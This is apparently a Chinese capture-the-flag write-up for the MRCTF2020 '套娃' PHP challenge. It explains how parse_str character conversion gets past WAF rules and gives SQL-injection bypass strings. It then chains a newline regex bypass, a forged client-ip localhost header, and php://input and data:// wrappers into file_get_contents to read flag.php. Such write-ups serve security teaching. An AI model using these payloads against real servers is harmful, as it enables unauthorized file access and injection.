[MRCTF2020]套娃 GET POST 读取字符串特性 伪造ip 伪协议伪造 file_get_contents()

知识点

利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户

我们通过 GET POST 传递参数是将字符串作为数组传递

那么传递了参数 做了什么操作

这里是通过 parse_str 来处理的

这里能发现 就是进行了两个操作

复制代码
删除空白符

将有一些特殊符号转变为下划线

运用这里我们就可以绕过许多的waf 或者拦截

复制代码
alert http any any -> $HOME_NET any (\
    msg: "Block SQLi"; flow:established,to_server;\
    content: "POST"; http_method;\
    pcre: "/news_id=[^0-9]+/Pi";\
    sid:1234567;\
)

例如上面存在这个规则 过滤了 news_id

我们要如何实现绕过呢, 下面这些方法都可以实现

复制代码
news[id=1'+and+1=1#

news%5bid=1'+and+1=1#    这里的 %5b就是 [ 

news_id%00=1'+and+1=1#   通过00截断来实现绕过

{chr}foo_bar -> 20 ( )
{chr}foo_bar -> 26 (&)
{chr}foo_bar -> 2b (+)
foo{chr}bar -> 20 ( )
foo{chr}bar -> 2b (+)
foo{chr}bar -> 2e (.)
foo{chr}bar -> 5b ([)
foo{chr}bar -> 5f (_)
foo_bar{chr} -> 00 ()
foo_bar{chr} -> 26 (&)
foo_bar{chr} -> 3d (=)

这里面就显示了 我们 在每个位置可以 选择绕过的 字符

做题

首先可以通过查看源代码获得提示

复制代码
<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

然后我们需要绕过 第一个判断个数 又要过第二个正则 正则使用 %0A 即可

因为不会匹配第二行 但是 get又会删除第二行

第一个我们如何绕过呢 使用上面的表来桡过

所以payload就是

复制代码
?b.u.p.t=23333%0A

出现了新的提示

我们去访问一下这个php

看看源代码 晕了 才知道这个 fuckjs 代码 看别人wp

放到控制台运行

我们就post 一下

复制代码
Flag is here~But how to get it? <?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
}


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
这里是通过循环 可能是改变东西 不着急 到时候看看



echo 'Local access only!'."<br/>";
$ip = getIp();
这里需要伪造本地ip访问
通过 client-ip:127.0.0.1


if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
这里需要本地ip 并且通过get2333打开文件 里面内容为 todat is a happy day

echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
这里显然是需要通过 change来获得 flag.php 高亮
?>  

代码审计一下

这里主要就是伪造ip client-ip:127.0.0.1

其次就是通过 fie_get_content读取

这里又两个方式

读取方法一

复制代码
?2333=php://input


POST内容中

todat is a happy day

方法二

复制代码
通过 data伪协议

?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=

这两个方法都可以

选择就是如何绕过 change 输出flag 就要开始逆向了

复制代码
function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}


首先通过 base64解密 然后对内容进行 +

我们逆向就先对内容进行 - 然后 base64加密即可

<?php

function change($v){ 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) - $i*2 ); 
    } 
    return base64_encode($re); 
}
echo change("flag.php");

获得了 flag.php的加密

复制代码
ZmpdYSZmXGI=

我们现在传递参数即可

复制代码
?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=

请求头

client-ip:127.0.0.1

或者

复制代码
?2333=php://input&file=ZmpdYSZmXGI=

POST

todat is a happy day

请求头

client-ip:127.0.0.1

这里就得出来 flag

确实和题目中的一样 套中套啊

相关推荐
Yff_world5 分钟前
网络安全与 Web 基础笔记
前端·笔记·web安全
shejizuopin5 分钟前
基于SSM的高校旧书交易系统的设计与实现(任务书)
java·mysql·毕业设计·论文·任务书·基于ssm的·高校旧书交易系统的设计与实现
Sapphire~6 分钟前
Vue3-19 hooks 前端数据和方法的封装
前端·vue3
1candobetter13 分钟前
JAVA后端开发——Spring Boot 组件化自动配置机制
java·开发语言·spring boot
浩宇软件开发14 分钟前
基于OpenHarmony鸿蒙开发医院预约挂号系统(前端后端分离)
前端·华为·harmonyos
码农小卡拉16 分钟前
MyBatis-Flex 全面解析与实战教程:轻量高效的 MyBatis 增强方案
java·mybatis
没有bug.的程序员16 分钟前
Spring Boot 与 Sleuth:分布式链路追踪的集成、原理与线上故障排查实战
java·spring boot·分布式·后端·分布式链路追踪·sleuth·线上故障排查
小李独爱秋17 分钟前
计算机网络经典问题透视:简述一下无线局域网中的NAV
服务器·网络·计算机网络·信息与通信·nav
Henry Zhu12318 分钟前
数据库(一):三级模式与两级映像
服务器·数据库
袁煦丞 cpolar内网穿透实验室19 分钟前
Blackbox Exporter告别用户投诉!从外部揪出服务断连问题: cpolar 内网穿透实验室第 701 个成功挑战
运维·服务器·远程工作·内网穿透·cpolar